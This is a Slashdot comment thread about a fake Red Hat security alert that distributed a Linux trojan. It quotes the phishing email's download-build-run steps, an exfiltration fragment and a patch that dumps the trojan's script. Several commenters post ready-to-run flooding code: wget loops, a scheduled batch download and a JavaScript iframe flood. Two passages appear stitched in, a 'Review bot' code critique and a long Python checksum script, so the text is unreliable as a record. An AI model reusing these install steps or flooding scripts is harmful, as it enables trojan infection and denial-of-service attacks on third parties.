      ~~~

    2. Re:notifying the appropriate people.... by Indy1 · · Score: 1

      Neither ev1 nor above.net will do shit about this. Both are massive spam/abuse havens and ignore or bounce abuse complaints. Solution? Firewall the offending net ranges.

      --
      Lawyers, MBA's, RIAA? A jedi fears not these things!
  106. Re: I'll try it... Execution results! by OmegaBlac · · Score: 3, Funny
    But it fails and spits out a bunch of errors!
    Sounds like my last kernel compile.
  107. Windows Firefox .10 users beware.. by Anonymous Coward · · Score: 0

    Look for script-fu.exe in your running processes

  108. Since this is a malicious site... by Vishruth · · Score: 1

    I say, for the good of the world, fedora-redhat.com should be slashdotted ASAP!

  109. Re: I'll try it... Execution results! by schon · · Score: 4, Funny

    Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

    If you do, make sure the IP addresses are of .mil and .gov sites. :o)

  110. Re: I'll try it... Execution results! by enginuitor · · Score: 1

    I actually tested it on a Fedora Core 2 machine as well. I had a similar problem, though I've reconfigured the heck out of it since the initial install, so perhaps it would work fine on a fresh installation.

  111. Re:What's the problem? by Anonymous Coward · · Score: 0

    HAHA LINUX IS TEH SUCK!!!!!!

  112. Lets 'fix' this problem THE SLASHDOT WAY! by Anonymous Coward · · Score: 0

    DDoSing a site is immoral and wrong, but we have a site where a user with an email named root is sending out trojans, root@addlebrain.com, now what could angry Slashdot users POSSIBLY do to this site given that DDoSing is immoral... well, since there's nothing we can do, how about every Slashdotter gives this site the benefit of the doubt and visits it once, in 5, 4, 3, 2, 1 NOW!

  113. Bittorrent? by OmegaBlac · · Score: 1

    Anyone got a torrent? I'm sure we the Open Source community could use the power of the almighty /. effect to speed up the distribution of this "security update" to all the vulnerable "Redhat" and Fedora users downloading it and ease up on their smoking server. C'mon! Help these wonderful guys at http://fedora-redhat.com/ , who took the big step in opening their source code which allows us the community to improve their product!

  114. once again by Anonymous Coward · · Score: 0

    life is good being a mac user

    1. Re:once again by Anonymous Coward · · Score: 0

      lol, why?

      If someone sends you an email that says "please run the command 'rm -rf /' immediately or risk exposure to remote exploits", what will you do then?

  115. I knew it by ganhawk · · Score: 2, Funny

    I knew, my habit of not updating my systems would help me someday.

    --
    Python script to convert photos into "artsy" portraits: http://p2pbridge.sf.net/pyPortrait/
  116. Re: I'll try it... Execution results! by Anonymous Coward · · Score: 0

    so, it requests the root password

    since when is echo used to request information, dumbass?

  117. domain name payment? by Anonymous Coward · · Score: 0

    Someone had to pay for the domain name.
    Is the site still up? Where is the FBI? If it was a fake Windows update, would it still be running?

  118. hidden image on page by Anonymous Coward · · Score: 0

    http://visit.geocities.com/visit.gif

  119. Re: text (Why? Because.) by Feanturi · · Score: 4, Insightful

    without bothering to RTFA, and mistakenly think that it's a legit patch,

    Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.

  120. Was it really in email? by Anonymous Coward · · Score: 0

    Wouldn't it be funny if it wasn't really sent via e-mail, and this whole thing was set up to get /. editors to post it and hopefully get people to click on it there? ;)

  121. Re: I'll try it... Execution results! by wonderbar · · Score: 1

    I tried translating "Inca un root frate belea" from every language that babelfish allows into English. It didn't work.

    Googling "frate belea" turns up all URLs with the suffix '.ro' so it would seem likely that this is Romanian in origin.

  122. E-mail root@addlebrain.com by Anonymous Coward · · Score: 0

    I'd like to invite everyone in this fine forum to mouth off to root@addlebrain.com. I just did. It really worked wonders for my morale. ;)

  123. Re: text (Why? Because.) by Neuroelectronic · · Score: 1

    Slashdot that motherfucker! Yes, Sir.

  124. honeypot online by codepunk · · Score: 1

    Anyone bring a honeypot online and execute the code yet to see if anyone knocks?

    --
    Got Code?
  125. Nothing to worry about by Pan+T.+Hose · · Score: 1

    "Beware 'Fedora-Redhat' Fake Security Alert"

    Call me frivolous, but I would be more concerned if it was a real security alert. On the other hand, it may be rather understandable that Redhat, while having much less of free publicity on Slashdot than Microsoft does with daily news about newly discovered vulnerabilities, cannot really do much more than resort to posting "Beware: Redhat is secure!" stories like this one. What can I say, kudos for Redhat security team for not having real security alerts to talk about. This by itself is an impressive achievement.

    --
    Sincerely,
    Pan Tarhei Hosé, PhD.
    "Homo sum et cogito ergo odi profanum vulgus et libido."
  126. This should be a mandatory feature by Anonymous Coward · · Score: 1, Insightful

    This is so cool !

    Given that most users of Mozilla/Thunderbird are end users, and a large percentage would not run their own MTA, this would be a wonderful permanent feature in Mozilla.

    It would be even better if you could use it as a rule to manage messages - ie immediately trash spoffed messages without presenting them to the end user.

    Given the (lack of) speed with which ISP's are implementing SPF doing it at the MUA end is a great stopgap.

    Please submit it - it's a damn fine idea.

  127. link to a translation by danalien · · Score: 2, Informative

    here is a slashdot user who has translated it.

    --
    I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
  128. Blow by blow by Anonymous Coward · · Score: 2, Funny

    It appears the human body maintains a temperature of approximately 98.6'F... lemmie shove a thermometer up my @ss, and I'll report back my findings here.

    1. Re:Blow by blow by Anonymous Coward · · Score: 0
      It appears the human body maintains a temperature of approximately 98.6'F... lemmie shove a thermometer up my @ss, and I'll report back my findings here.

      I've heard that the same temperature is maintained in the mouth, below the tongue. Can you check that out next? Thx.

    2. Re:Blow by blow by Anonymous Coward · · Score: 0

      Do so and have a seat.

  129. I can hear the naysayers already by Anonymous Coward · · Score: 0

    The microsoft fanclub around these parts is saying "see, linux has security problems too!", high fiving each other and doing that weird little victory dance, but let's step back for a moment and compare this clumsy and bizarre linux hack attempt with the problems facing the windows user.

    This evening, I just installed windows on my wife's new computer (That's what she knows, and she doesn't want anything new or different) and within 5 minutes of accessing the internet, it was infested with spyware. I knew things were bad with windows, but give me a break!

    Now compare to the linux hack attempt in question. First of all, the message would have to reach someone who combines 2 things which have largely been kept separate up to now: root access to a unix system, and an incredible lack of sophistication.

    The hapless super-user would have to believe a bizarre message which is completely different from any redhat security bulletin which has ever been seen, in several ways:

    #1, redhat and other linux vendors do not tell end users to "apply a patch", but rather they supply an updated package that is normally installed via the vendor's automated update mechanism for paying customers, or via download and install of rpm packages for the general public. (apt-get users also have an automated procedure for this).

    #2, the grammar was crude and amateurish, an immediate red flag.

    #3, there was some weird reference to bsd and solaris which made no sense and was completely irrelevant.

    #4, there was no link to the relevant advisories as is the case with any legitimate security bulletin..

    #5, the admin is asked to go download a tarfile from some student's home directory - oh yeah, sounds like a plan!

    there are several more glaring examples of why this was immediately bogus, but you get the idea.

    1. Re:I can hear the naysayers already by WhatAmIDoingHere · · Score: 1

      Within 5 minutes? Did you install firefox? No?
      Spybot? No?
      Adaware? No?
      A firewall? Virus protection?

      You need to be active in your defences.

      --
      Not a Twitter sockpuppet... but I wish I was.
    2. Re:I can hear the naysayers already by Anonymous Coward · · Score: 0

      Within 5 minutes? Did you install firefox? No?
      Yes, it was within 5 minutes at the most. No, I hadn't yet installed firefox - I had just finished the install and was trying to install the security updates when I noticed all the weird spyware and adware symptoms.

      Spybot? No? Adaware? No?
      I found adaware and am running that, but the whole peecee is so unresponsive it's difficult to tell if it's locked up or just running very slowly. It is also very difficult to download anything with the sluggishness and constant popups.

      A firewall? Virus protection?
      Are you kidding? no way I would put windows directly on the internet, you better believe it's behind a firewall. Virus protection? coming right up...

      You need to be active in your defences.
      You gotta be kidding me - it is not humanly possible to be any more active. sheesh, the crap windoze users accept as normal just boggles the mind...

    3. Re:I can hear the naysayers already by WhatAmIDoingHere · · Score: 1

      You don't put a box online without having the patches installed first.

      Order the FREE update CD from Microsoft or download them on another computer, burn them to a CD and install them.

      Chances are that unless you've used IE to go to any site other than windowsupdate or mozilla.com, you had no spy/adware.

      --
      Not a Twitter sockpuppet... but I wish I was.
    4. Re:I can hear the naysayers already by Anonymous Coward · · Score: 0

      You are completely missing the point.

      Every windows trojan is EXACTLY THE SAME, and yet clueless users STILL infect themselves.

      This is a lesson that Linux has apparently not yet learned. Sure, smart/paranoid people have nothing to fear (I've never gotten a virus or trojan in 15 years of MS product use) but the problem is, there is a MUCH LARGER share of stupid computer users out there, exactly the type of people that Red Hat is catering to.

      This WILL become a serious "linux" issue in the future, but you and a huge number of others on /. just continue to bury your head in the sand about the problem.

      Stop saying "It can't happen to Linux" and start saying "It CAN happen to Linux so beware". Start educating instead of FUDding your public as you are doing, it will serve Linux better in the long run.

  130. How come the site is still up?! by Anonymous Coward · · Score: 0

    How come the site is still up?!
    It's a proven fraud, a comp. security attack.
    How come the site is still up?!
    Where is Yahoo, where is FBI, where is Homeland Security?
    Anyone explain, please.

  131. Neutering the trojan by Anonymous Coward · · Score: 1, Informative

    The following patch will cause the program to print out the embedded script rather than execute it, so that you may see what it is trying to do:

    --- inst.c Sat Oct 23 11:02:12 2004
    +++ inst.c.harmless Sun Oct 24 22:00:27 2004
    @@ -378,8 +378,12 @@
    return 0;
    memset(scrpt, (int) ' ', sizeof(hide_t));
    memcpy(&scrpt[sizeof(hide_t) - sizeof(text_t)], text, sizeof(text_t));
    + printf("%s\n", scrpt);
    + exit(0);
    } else {
    scrpt = text; /* Script text */
    + printf("%s\n", scrpt);
    + exit(0);
    }
    } else { /* Reexecute */
    if (*xecc) {
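    Review bot: both added printf("%s\n", scrpt) calls assume scrpt is NUL-terminated, and the first branch does not guarantee that: memset fills all sizeof(hide_t) bytes with spaces and memcpy drops sizeof(text_t) bytes of text into the tail, so unless text itself ends in a NUL the print runs off the end of the buffer. Print with an explicit length instead, for example `fwrite(scrpt, 1, sizeof(hide_t), stdout);` in the first branch or `printf("%.*s\n", (int) sizeof(hide_t), scrpt);`. The two printf/exit pairs are also identical and can be hoisted to a single statement right after the if/else that assigns scrpt, which shrinks the change to one two-line hunk. Since this is an analysis build and the rest of the binary is untouched, the dumped text should be read, not piped into a shell.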

  132. isn't the first sentence the most obvious mistake? by Anonymous Coward · · Score: 0

    I did not read every post, but the first line
    is basically a slap in the face.

    > Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

    anyone with any knowledge of unix security, should know this is impossible :D

    so did someone mention it above or what?

  133. Re: text by physicsphairy · · Score: 1
    Potentially that could bring the server offline and cost them a bundle for a great two-sided effect

    So... if I wanted to download the script, delete it, and re-download it ad infinitum, any notions on a command like trick to do that? (sorry, yes, I'm a silly n00b)

  134. Re: I'll try it... Execution results! by Anonymous Coward · · Score: 0

    root@addlebrain.com is up for quite a lot of gay porn spam :)

  135. I guess... by Tuxedo+Jack · · Score: 1

    I guess it's not wrong to write a batch script to automate a download over and over in a Windows machine.

    And then schedule it to run every five minutes.

    For the next week.

    In my case, that'll go to...

    D:\installers\wget\wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz =

    Copy and Paste in Notepad as you see fit. Mine's a meg and a half.

    --

    Striking fear in the authors of godawful fanfiction, I am here, appearing in darkness, Tuxedo Jack!
  136. A grammar tip for Slashdot by Anonymous Coward · · Score: 0

    "Some of the effected distriubtions include..."

    It's affected.
    To effect means "to bring about" or "to cause to happen." To affect means "to change" or "to influence." What that quote actually means is "Some of the distributions this exploit created include..."

  137. Re: I'll try it... Execution results! by e9th · · Score: 1
    ...protect your shell scripts from modification or inspection.

    Sr. Rosales really has that whole FOSS vibe going, doesn't he:-(

  138. From the WHOIS: by Anonymous Coward · · Score: 3, Informative

    I looked at the whois... fedora-redhat.com reported:

    Raymond Jackson
    224 Cedar Avenue
    New York, NY 95301.
    209 899-4533

    However, 95301 is an Atwater, CA zip code.

    So, I looked up Raymond Jackson in Atwater. What did I find?


    Raymond Jackson
    224 Cedar Avenue
    Atwater, CA 95301
    209 358 8510.

    Looks like he did a crappy job of disguising his identity. Go get him!!!

    1. Re:From the WHOIS: by SuiteSisterMary · · Score: 1

      Or, he used the old trick of using an obvious, easily-discovered lie to hide the deeper, more meaningful lie.

      Or, to put it another way, he went to a CA directory, pulled out a random name, registered under that, cleverly putting in an incorrect city/state, but not changing the zip code, giving Internet armchair detectives something to discover.

      Of course, this is unlikely, and the idiot REALLY DID just use his own name, but the possibility can't really be discounted out of hand, can it?

      --
      Vintage computer games and RPG books available. Email me if you're interested.
  139. dont bother wasting your time.... by Indy1 · · Score: 2, Informative

    host fedora-redhat.com
    fedora-redhat.com has address 66.218.79.149
    fedora-redhat.com has address 66.218.79.155
    fedora-redhat.com has address 66.218.79.147
    fedora-redhat.com has address 66.218.79.148

    whois 66.218.79.149

    OrgName: Yahoo!
    OrgID: YAOO
    Address: 701 First Avenue
    City: Sunnyvale
    StateProv: CA
    PostalCode: 94089
    Country: US

    NetRange: 66.218.64.0 - 66.218.95.255
    CIDR: 66.218.64.0/19

    Trying to ddos yahoo won't get you very far : )

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
    1. Re:dont bother wasting your time.... by Anonymous Coward · · Score: 0
      Trying to ddos yahoo wont get you very far : )

      They probably have between 25 to 200 GB of bandwidth and he/she/it/shit is hosting a ~1MB file. It'd be rude not to.

    2. Re:dont bother wasting your time.... by Anonymous Coward · · Score: 0

      Just in case you DO want to bother...

      Domain Name.......... fedora-redhat.com

      Organisation Name.... Raymond Jackson
      Admin Name........... Raymond Jackson
      Admin Address........ 224 Cedar Avenue
      Admin Address........ New York
      Admin Address........ 95301
      Admin Address........ NY
      Admin Address........ UNITED STATES
      Admin Email.......... rayjackson23@yahoo.com
      Admin Phone.......... +1.2098994533

  140. Re: I'll try it... Execution results! by Anonymous Coward · · Score: 0

    Or have someone at everyone.net (hosters of addlebrain.com MX) do some research into who's been using that mail address.

    If it's forwarded, have some white hat cracker crack the destination box and follow the chain.

    Something tells me the culprits aren't too clever, though.

  141. Re: I'll try it... Execution results! by SnowZero · · Score: 1

    Aha, so this trojan is vulnerable to a symlink attack using /tmp/mama! Stupid trojan writers can't write secure code...

  142. RH needs to issue a DMCA takedown notice by davidwr · · Score: 1

    Redhat's trademarks are being violated left and right, time for a DMCA takedown notice or whatever the trademark equivalent is.

    Then launch the lawsuit and criminal case.

    BTW, looks like Yahoo had something to do with the domain registration, getting them TOSsed might be the quickest solution.

    --
    Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
    1. Re:RH needs to issue a DMCA takedown notice by Anonymous Coward · · Score: 0

      hahaha

  143. Re: I'll try it... Execution results! by labratuk · · Score: 1

    That won't make any difference. The author would probably just filter out all mails without the subject line "Inca o roata".

    --
    Malike Bamiyi wanted my assistance.
  144. Re: text (Why? Because.) by nile_list · · Score: 1

    Are you kidding me? The title of the story is "Beware Fake Security Alert." Surely /.er's are a bit more capable than mindlessly clicking lemmings? On the other hand...

    --
    Gnash Gnash Gnash
  145. Re: I'll try it... Execution results! by Anonymous Coward · · Score: 1, Insightful

    The original email that was making the rounds:

    Dear RedHat user,

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

    The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

    * First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
    * Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

    Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

    Thank you for your prompt attention to this serious matter,

    RedHat Security Team.

    Copyright © 2004 Red Hat, Inc. All rights reserved.

    The interesting thing is the link that is listed to download the trojan. It's the Stanford website. The person who owns /~joeio is Irene O Joe from Law School. Was the Stanford website compromised?

  146. Problem with this line of logic by Anonymous Coward · · Score: 0

    If the visitor has first visited Redhat's site prior to visiting this fake site, it will merely grab the image from the cache. It's just like when going to a google cache of some freeweb site. Initially, you won't see the images, but when you visit the actual page and go back to the google cache, the images appear the second time since they are now cached.

  147. Full decryption of the shell script by moyix · · Score: 3, Informative

    Someone on the full-disclosure has posted a good analysis of what this is. Have a look at this thread.

  148. Suggestion, to speed up the slashdotting by Anonymous Coward · · Score: 0
    Everyone create an html file with this:
    <script language="javascript">
    for( i = 0; i < 100; i++ )
    document.writeln('<iframe width="100" height="100" src="http://fedora-redhat.com/"></iframe><br />');
    </script>
    And run it a couple of times :).
  149. bandwidth bills! by FooAtWFU · · Score: 1

    Yeah, but the bandwidth bill is going to be out of this world.

    --
    The World Wide Web is dying. Soon, we shall have only the Internet.
  150. Wondering by rjdohnert · · Score: 1

    How many admins have downloaded and installed it already, not too many admins read Slashdot.

  151. Interesting by mixmasterjake · · Score: 1

    It seems like most Windows virus writers just adapt someone else's "proof of concept" virus, or take a virus that's already written and add their own payload. I've been wondering when someone would get some wide-spread attention with a Linux virus. All of the copy-cats will probably take this code and, thanks to the helpful suggestions here on slashdot, fix the bugs and do a better job with the phishing email. I have a feeling we haven't seen the last of this..?

    --
    TODO: come up with a clever sig
  152. If RedHat is aware, why is it still there? by Richard_J_N · · Score: 1

    I often wonder this - why is it that the websites of phishing scams remain up for so long? You'd think that RHat would have been able to deal with this by getting the site taken down ASAP. Likewise with many banking scams. If this had been executed more correctly, many people might have fallen for it - it always surprises me how stupid many of these scammers are.

  153. Re: I'll try it... Execution results! by Spoing · · Score: 2, Insightful
    Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

    Not if you run your own mail server(s).

    As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?

    (Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never done it before.)

    --
    A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
  154. What Redhat can do to stop this by zsazsa · · Score: 1

    The offending fedora-redhat.com page includes the graphic http://www.redhat.com/g/chrome/logo_rh_home.png to lend an official air to their site. Why doesn't Redhat simply change that image to say something like: "Notice from Redhat: this is NOT an official Redhat page. The download on this page contains malicious code. DO NOT DOWNLOAD IT. Please consult www.redhat.com for official details." They could even just check the referrer so it'll only give the message when loaded from fedora-redhat.com.

    I've also seen various phishing emails that use graphics from the websites of the banks they're masquerading as (Citibank, SunTrust). Simply changing these would cut down on scams and trojans like these.

    1. Re:What Redhat can do to stop this by Anonymous Coward · · Score: 0

      it would be hard to fit all that in a tiny image like that.. plus referrer headers are easy to fake and some people block them... so it wouldn't work for everyone

      the only way it would work is if they just replaced that image completely, but then any cached pages or mirrors that use that image will display the warning even if the site is legit

    2. Re:What Redhat can do to stop this by Junta · · Score: 1

      What's to stop them from simply downloading the graphic and using it themselves? It's not like they aren't already doing enough wrong that swiping graphics would make a huge difference...

      True, the URL looks more legit if the link is direct, but anyone smart enough to look at the tags knows that doesn't ultimately mean anything.

      --
      XML is like violence. If it doesn't solve the problem, use more.
  155. Kernel breaks compatibility by ewe2 · · Score: 1

    Is there a patch to fix it, or should I downgrade? Why aren't linux trojans given as much attention as their windows counterparts?

    --
    insecurity asks the wrong question irritation gives the wrong answer
  156. Re: I'll try it... Execution results! by Goeland86 · · Score: 1

    meh, I'm hidden behind the school firewall... I'll use the output of one of my programs from CS with an output of '+'s to that address... they're in for a sad day...

    --
    ---- I am certain of only one thing : I know nothing else.
  157. And so it begins... by petrus4 · · Score: 1

    It's the fact that we're seeing this kind of thing now which in my mind lends credence to the idea that Linux's relative obscurity is the main reason why we haven't seen such things in the past, rather than any inherent superiority in the multiuser system.

    To me there are also a couple of obvious questions to be asked, here...

    a) I wonder how many more of these things we're going to be seeing...and I'm assuming that this one is only the initial harbinger of a tidal wave of them, and...

    b) I'm also wondering if the authors of any of these are going to be on Microsoft's payroll. Attempting to write Linux-specific malware in an attempt to discredit/sabotage the operating system would be IMHO entirely consistent with Microsoft's track record of corporate ethics. (or lack thereof)

    The good news of course is that to a degree the multiuser system still offers *some* protection, in terms of it hopefully being the scenario that the regular user downloading this file will be someone other than root on many systems, and that root will hopefully be someone with more of a clue than said regular user.

    Of course, the best defense in situations like this is to *always* use projects like this one in order to create/install your Linux system. As I've said in another of my posts, while Red Hat have made some valuable contributions to Linux in terms of isolated pieces of software, with their overall OS they are still taking the fundamentally broken approach of attempting to make Linux into just more homogenised, predigested "content" that they can then use to make money. As long as that is the main thing they care about (as opposed to actually making a robust system), they're going to have a system which won't be all that much less broken than Windows. On an individual basis, kudzu and Red Hat's other apps are good... but on an integrated basis, I wouldn't use Fedora or RHEL if you paid me.

    1. Re:And so it begins... by Antique+Geekmeister · · Score: 1

      Friend, you haven't been in the business that long. This stuff goes *WAY* back, at least to the era of VMS being considered an operating system. Having to recompile core systems and patches from scratch, as you suggest, is precisely one of the behaviors that encourages script kiddies to submit and successfully propagate this kind of nonsense. Few users at the start of their careers will have the skills to actually evaluate the guts of the packages they download.

    2. Re:And so it begins... by petrus4 · · Score: 1

      > Few users at the start of their careers will have the skills to actually evaluate the guts of the packages they download.

      You're right. I'll admit quite openly that I don't have the skills to code audit at all, for the most part. However, what I *can* do is use such measures as MD5/GPG signature verification. MD5 in particular isn't perfect...I remember an article on here a bit back about its foibles...but that possibly *in conjunction* with something stronger like PGP or GPG can go a long way towards verifying that I've got what I meant to get, from the person/group I was meaning to get it from.

      Nothing can take the place of being proactive. If I go directly to the CVS/FTP server of a given project and get the stable branch from there, I at least know I'm getting the project's code from the actual authors of the project...even if one of said coders turns evil and inserts malicious code into it. ;-)

      Certainty is a very difficult thing to attain no matter what you do, to a degree... It's even more so because of that reason that what I'm advocating here is that people don't take the passive consumer approach and simply expect to be spoon fed patches. Yes, I am a newbie, comparatively speaking... but I intend to be one for as short a time as possible... and the only way I can ensure that is to be responsible for my own learning.

    3. Re:And so it begins... by Tony-A · · Score: 1

      > Few users at the start of their careers will have the skills to actually evaluate the guts of the packages they download.

      A few users have that ability. Some of them even use that ability. They tend to be very noisy if they find anything amiss.

      If I go directly to the CVS/FTP server of a given project ... even if one of said coders turns evil and inserts malicious code into it.
      There are various cheap tricks including, downloading from a convenient mirror and comparing MD5s with the official site. Download, wait for noises, then install.

      Somebody has a "critical-critical" patch and there's not even a mention at the legitimate source? I'd trust an AC posted patch on /. a lot faster.

      simply expect to be spoon fed patches
      That's the way to ensure vulnerability, even on OpenBSD.
      If a system is secure, the one way to break that security is to somehow induce somebody to patch that system and make it insecure. It's been done before.
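    The checksum comparison petrus4 and Tony-A describe above (check the downloaded files against a published MD5/SHA sums list, and compare a mirror's list with the official site's), written out as an added example. This is not code from the thread or from Red Hat: the file names, file contents and both checksum lists are constructed inline so the script runs offline, and the "tampered mirror" is simulated by replacing one digest. GPG verification of a detached signature against a key obtained out of band is the stronger step and is not shown here.

```python
"""Verify downloads against a `<hexdigest>  <filename>` checksum list.

Added example (constructed data, not the real tarball from the thread).
The line format is the one md5sum/sha256sum -c consume.
"""
import hashlib
import hmac

# Constructed sample "downloads": filename -> bytes.
FILES = {
    "fileutils-1.0.6.patch.tar.gz": b"not a real tarball, just sample bytes\n",
    "README": b"sample readme\n",
}


def parse_sums(text):
    """Parse checksum-list lines into {filename: hexdigest}.

    GNU coreutils marks binary mode with a leading '*' on the name; strip it.
    Blank lines and '#' comments are ignored; malformed lines raise.
    """
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.strip().lstrip("*")
        try:
            int(digest, 16)
        except ValueError:
            raise ValueError("malformed checksum line: %r" % line)
        if not name or len(digest) not in (32, 64):
            raise ValueError("unsupported checksum line: %r" % line)
        entries[name] = digest.lower()
    return entries


def digest_for(data, hexlen):
    """Pick the hash by digest length: 32 hex chars = MD5, 64 = SHA-256.

    MD5 is still accepted because many sums lists of the era used it; prefer
    a SHA-256 list whenever the project publishes one.
    """
    algo = {32: "md5", 64: "sha256"}[hexlen]
    return hashlib.new(algo, data).hexdigest()


def check_files(sums_text, files):
    """Return {filename: 'OK' | 'FAILED' | 'MISSING'}, like `sha256sum -c`."""
    results = {}
    for name, expected in parse_sums(sums_text).items():
        if name not in files:
            results[name] = "MISSING"
            continue
        actual = digest_for(files[name], len(expected))
        # constant-time compare: cheap insurance when comparing digests
        results[name] = "OK" if hmac.compare_digest(actual, expected) else "FAILED"
    return results


def mirrors_agree(official_sums, mirror_sums):
    """Tony-A's cheap trick: every entry on the mirror's list must match the
    official site's list. Returns the set of file names that differ."""
    official = parse_sums(official_sums)
    mirror = parse_sums(mirror_sums)
    return {name for name in official if mirror.get(name) != official[name]}


# Constructed SHA-256 list, as the official site would publish it.
OFFICIAL_SUMS = "\n".join(
    "%s  %s" % (hashlib.sha256(data).hexdigest(), name)
    for name, data in FILES.items()
)
# Constructed tampered mirror list: the tarball's digest is replaced.
MIRROR_SUMS = OFFICIAL_SUMS.replace(
    hashlib.sha256(FILES["fileutils-1.0.6.patch.tar.gz"]).hexdigest(), "00" * 32
)

if __name__ == "__main__":
    print(check_files(OFFICIAL_SUMS, FILES))
    print("mirror disagrees on:", mirrors_agree(OFFICIAL_SUMS, MIRROR_SUMS))
```

    A sums list fetched from the same server as the tarball proves nothing about the server; fetch it from the official site (or from a second mirror, as Tony-A suggests) and only then run the check.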

  158. Re: I'll try it... Execution results! by WindBourne · · Score: 2, Funny
    You can do better.
    Try:
    • 216.250.128.21
    • 207.46.144.188

    These are more than good enough.
    --
    I prefer the "u" in honour as it seems to be missing these days.
  159. Re: I'll try it... Execution results! by WindBourne · · Score: 1

    Has it dawned on you that obviously somebody does click on those things? For all you know, you just made this person's day.

    --
    I prefer the "u" in honour as it seems to be missing these days.
  160. OT by bomb_number_20 · · Score: 1
    I'm a BANANA.

    (Sorry, couldn't resist.)

    --
    That's ok, Jesus likes me anyway.
  161. Useless use of Cat ? by elfdump · · Score: 1

    > cat /tmp/mama | mail -s

    Couldn't this be done more efficiently with the redirection operator instead of cat? Maybe this guy deserves a Useless use of Cat award:

    http://laku19.adsl.netsonic.fi/era/unix/award.html

  162. Re: Fully Patched? IE6 by Anonymous Coward · · Score: 0

    Even fully patched, IE6 is vulnerable to forced install of crap.

    If you want to have a tonne of spyware/adware installed onto your system (specifically system32), load up this site with IE6. Fully patched or not, it will install several spywares automatically upon loading up the main site. No permission is asked, and no dialogs pop up. The only indication that anything's wrong is that there's a lot of activeX "plugin" mentions in the status bar, and a lot of warnings from your firewall as the spyware phones home.

    http://www.torrentreactor.com

    Warning. Yet another reason not to visit warez sites.

  163. Re:Real link?h by mauryisland · · Score: 1

    Damn nice idea, though.

  164. Re: text by SlickMcSly · · Score: 1

    while true; do
        wget -q http://www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz -O /dev/null
    done

    Though as I was testing it, the site in question was taken down.

  165. Site Temporarily Disabled by Anonymous Coward · · Score: 0

    And it's down...

    "This site has been temporarily disabled. If you are the owner of the site, please contact customer care."

    1. Re:Site Temporarily Disabled by Anonymous Coward · · Score: 0

      DOWN!

    2. Re:Site Temporarily Disabled by Anonymous Coward · · Score: 0

      Kick ass! We did it with all our wget -q -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz lines!

  166. abuse@yahoo.com is your friend... by Anonymous Coward · · Score: 0

    I sent an email to abuse@yahoo.com and it was fixed in a matter of minutes!

    Go Yahoo, go.

    --- snip ----
    This website fedora-redhat.com is not in any way
    affiliated with RedHat nor FedoraCore. Its sole
    purpose is to falsely claim a security issue and
    provide a link for a trojan to be installed.

    This site is being hosted by you guys.

    Please take it offline as soon as possible.

    --- Thanks!
    ---- snip -----

  167. WHY? by Anonymous Coward · · Score: 0

    Why is the source site still up?

  168. Re: I'll try it... Execution results! by SynKKnyS · · Score: 1

    They also offer free email. More than likely someone created an account called "root".

  169. Really? by lewp · · Score: 0, Troll

    Slashdot will probably be a more efficient delivery mechanism for this thing than email ever was. Let's see:

    • "Cares" about security?
    • Ignorant enough to fall for it, even when it's blatantly marked as a scam?
    • Runs Red Hat?

    Yeah, I think all of those guys are here.

    --
    Game... blouses.
  170. This is what happens... by the+angry+liberal · · Score: 3, Funny

    Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary.

    This is an unfortunate reality today. Back in my day, the only way to be a real Linux guru was to compile and build your system from scratch using a dev box.

    Nowadays, any average person can easily install Linux and instantly become "31337". Today's typical Linux user has no idea what half the files on his system do, or where they came from. Unfortunately, the majority of you with moderator points fall into this category, so my post is doomed!

    I would advise those who are new to Linux to visit the Linux From Scratch website and set aside a weekend of learning. There is no better method for gaining useful knowledge regarding the reduction of hard drive clutter, increasing optimization, and security.

  171. How Unfortunate! by Anonymous Coward · · Score: 0

    The site was up when I first read the article 30 minutes ago, but now accessing it gives a 503 Service Unavailable, and a message about the site having been taken down by the hosts.

    Seems that they couldn't handle the load of thousands of Slashdot users simultaneously downloading and giggling at their m4d scr1p71ng ski11z.

  172. Re: I'll try it... Execution results! by Anonymous Coward · · Score: 0

    Just before the site got disabled, I downloaded a new copy of the file.
    When I decoded the new file I got this email address behele21@yahoo.com instead, seems our friend had upgraded his security patch.

  173. Wouldn't it be nice if sites like this... by IchBinEinPenguin · · Score: 1

    ... were pulled as quickly as pirate
    But I guess the only 'security' enhanced by a such a move would be that of the end users, not that of the xxAA's bottom line.

    OK.... don't really mean to bash the xxAA, but I'm so sick of 'security' measures foisted on us that are utterly meaningless while stuff like this is left unchecked.

    Maybe RH should call up the ISP claiming copyright violation of the logo or somesuch, then they could close down the site and protect their users.

  174. fake security update - update by sgrayban · · Score: 1, Informative

    Site Temporarily Disabled

